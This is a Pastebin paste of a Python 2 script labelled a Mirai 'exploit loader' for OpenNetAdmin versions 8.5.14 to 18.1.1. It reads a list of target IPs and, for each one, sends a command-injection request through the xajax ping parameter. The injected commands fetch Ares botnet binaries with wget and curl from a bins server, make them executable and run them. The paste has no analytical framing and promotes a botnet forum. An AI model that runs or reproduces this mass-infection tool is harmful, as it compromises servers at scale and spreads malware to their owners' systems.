xB4ckdoorREAL

FIXED [NEW OPENNETADMIN EXPLOIT LOADER] [RCE] [MIRAI]

Dec 12th, 2019 (edited)
969
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.51 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # NEW OpenNetAdmin Exploit Loader made by B4CKDOOR #
  4. # AFFLICTED VERSION v8.5.14 to v18.1.1 #
  5. # B4CKDOORARCHIVE.CLUB - JOIN #
  6.  
  7. import threading, random, socket, time, sys, requests, re, os
  8. from threading import Thread
  9. from time import sleep
  10. import requests
  11. from requests.auth import HTTPDigestAuth
  12. from decimal import *
  13.  
  14. if len(sys.argv) < 2:
  15.     print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
  16.     sys.exit()
  17.  
  18. ip = "1.3.3.7" # BINS LOCATION IP
  19. vulns = open(sys.argv[1], "r").readlines()
  20. cmd1 = "wget http://" + ip + "/Ares.x86; curl -O http://" + ip + "/Ares.x86; chmod +x Ares.x86; ./Ares.x86 netadmin.x86"
  21. cmd2 = "wget http://" + ip + "/Ares.x64; curl -O http://" + ip + "/Ares.x64; chmod +x Ares.x64; ./Ares.x64 netadmin.x64"  
  22. #DEFAULT HTTPD PORT 80
  23. class send_payload(threading.Thread):
  24.     def __init__ (self, ip):
  25.         threading.Thread.__init__(self)
  26.         self.ip = str(ip).rstrip('\n')
  27.     def run(self):
  28.         try:
  29.             url = "http://" + self.ip + "/xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;"+cmd1+";&xajaxargs[]=ping"
  30.             url2 = "http://" + self.ip + "/xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;"+cmd2+";&xajaxargs[]=ping"
  31.             requests.post(url, timeout=3)
  32.             requests.post(url2, timeout=3)
  33.             print "[OpenNet-Adm] Loading: %s"%(self.ip)
  34.         except:
  35.             pass
  36.  
  37. for IP in vulns:
  38.     try:
  39.         ip = "".join(IP)
  40.         ip = ip.replace("\n", "")
  41.         t = send_payload(ip)
  42.         t.start()
  43.         time.sleep(0.03)
  44.     except:
  45.         pass #CODED BY B4CKDOOR
Add Comment
Please, Sign In to add comment